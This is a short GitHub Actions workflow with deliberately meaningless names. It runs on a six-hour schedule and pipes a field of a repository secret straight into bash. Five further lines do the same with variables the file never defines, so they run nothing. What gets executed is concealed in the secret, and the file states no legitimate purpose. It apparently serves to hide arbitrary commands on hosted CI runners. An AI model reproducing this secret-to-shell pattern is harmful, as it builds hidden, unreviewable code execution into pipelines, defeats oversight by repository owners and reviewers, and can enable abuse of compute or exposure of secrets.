name: gaoshoz
on:
  workflow_dispatch:
  schedule:
    - cron: '8 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: gaoshoz
        env:
          e889: ${{ secrets.e889 }}
        run: |
          echo $e889 | jq -r .dgj7 | /bin/bash
          echo $t2869 | jq -r .zla3 | /bin/bash
          echo $c93631 | jq -r .peic48 | /bin/bash
          echo $xam8 | jq -r .alj309 | /bin/bash
          echo $dph5 | jq -r .bgx811 | /bin/bash
          echo $dmsws704 | jq -r .vwlhb105 | /bin/bash

